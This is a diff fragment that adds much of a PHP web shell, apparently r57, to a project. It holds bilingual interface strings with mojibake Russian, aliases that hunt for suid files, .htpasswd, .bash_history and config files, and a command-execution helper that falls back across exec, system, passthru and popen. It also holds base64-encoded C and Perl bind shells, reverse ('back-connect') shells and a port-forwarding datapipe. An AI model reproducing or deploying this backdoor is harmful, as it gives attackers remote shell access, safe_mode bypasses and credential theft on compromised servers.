+'ru_text30'=>'Про�мотр файла',
+'ru_butt7' =>'Выве�ти',
+'ru_text31'=>'Файл не найден',
+'ru_text32'=>'Выполнение PHP кода',
+'ru_text33'=>'Проверка возможно�ти обхода ограничений open_basedir через функции cURL',
+'ru_butt8' =>'Проверить',
+'ru_text34'=>'Проверка возможно�ти обхода ограничений safe_mode через функци� include',
+'ru_text35'=>'Проверка возможно�ти обхода ограничений safe_mode через загрузку файла в mysql',
+'ru_text36'=>'Ğ‘Ğ°Ğ·Ğ°',
+'ru_text37'=>'Логин',
+'ru_text38'=>'Пароль',
+'ru_text39'=>'Таблица',
+'ru_text40'=>'Дамп таблицы базы данных',
+'ru_butt9' =>'Дамп',
+'ru_text41'=>'Сохранить в файле',
+'ru_text42'=>'Редактирование файла',
+'ru_text43'=>'Редактировать файл',
+'ru_butt10'=>'Сохранить',
+'ru_butt11'=>'Редактировать',
+'ru_text44'=>'Редактирование файла невозможно! До�туп только дл� чтени�!',
+'ru_text45'=>'Файл �охранен',
+'ru_text46'=>'Про�мотр phpinfo()',
+'ru_text47'=>'Про�мотр на�троек php.ini',
+'ru_text48'=>'Удаление временных файлов',
+'ru_text49'=>'Удаление �крипта � �ервера',
+'ru_text50'=>'Информаци� о проце��оре',
+'ru_text51'=>'Информаци� о пам�ти',
+'ru_text52'=>'Тек�т дл� пои�ка',
+'ru_text53'=>'И�кать в папке',
+'ru_text54'=>'Пои�к тек�та в файлах',
+'ru_butt12'=>'�айти',
+'ru_text55'=>'Только в файлах',
+'ru_text56'=>'�ичего не найдено',
+'ru_text57'=>'Создать/Удалить Файл/Директори�',
+'ru_text58'=>'Им�',
+'ru_text59'=>'Файл',
+'ru_text60'=>'Директори�',
+'ru_butt13'=>'Создать/Удалить',
+'ru_text61'=>'Файл �оздан',
+'ru_text62'=>'Директори� �оздана',
+'ru_text63'=>'Файл удален',
+'ru_text64'=>'Директори� удалена',
+'ru_text65'=>'Создать',
+'ru_text66'=>'Удалить',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Команда',
+'ru_text69'=>'Параметр1',
+'ru_text70'=>'Параметр2',
+'ru_text71'=>"Второй параметр команды:\r\n- дл� CHOWN - им� нового пользовател� или его UID (чи�лом) \r\n- дл� команды CHGRP - им� группы или GID (чи�лом) \r\n- дл� команды CHMOD - целое чи�ло в во�ьмеричном пред�тавлении (например 0777)",
+'ru_text72'=>'Тек�т дл� пои�ка',
+'ru_text73'=>'И�кать в папке',
+'ru_text74'=>'И�кать в файлах',
+'ru_text75'=>'* можно и�пользовать регул�рное выражение',
+'ru_text76'=>'Пои�к тек�та в файлах � помощь� утилиты find',
+'ru_text77'=>'Про�мотр �труктуры базы данных',
+'ru_text78'=>'Показывать таблицы',
+'ru_text79'=>'Показывать �толбцы',
+'ru_text80'=>'Тип',
+'ru_text81'=>'Сеть',
+'ru_text82'=>'Базы данных',
+'ru_text83'=>'Выполнение SQL запро�а',
+'ru_text84'=>'SQL запро�',
+'ru_text85'=>'Проверка возможно�ти обхода ограничений safe_mode через выполнение команд в MSSQL �ервере',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+�лиа�ы команд
+Позвол��т избежать многократного набора одних и тех-же команд. ( Сделано благодар� моей природной лени )
+Вы можете �ами добавл�ть или измен�ть команды.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>и</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '�шибка! �е могу запи�ать в файл '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '�шибка! �е могу прочитать файл '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "�е удало�ь �оздать "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
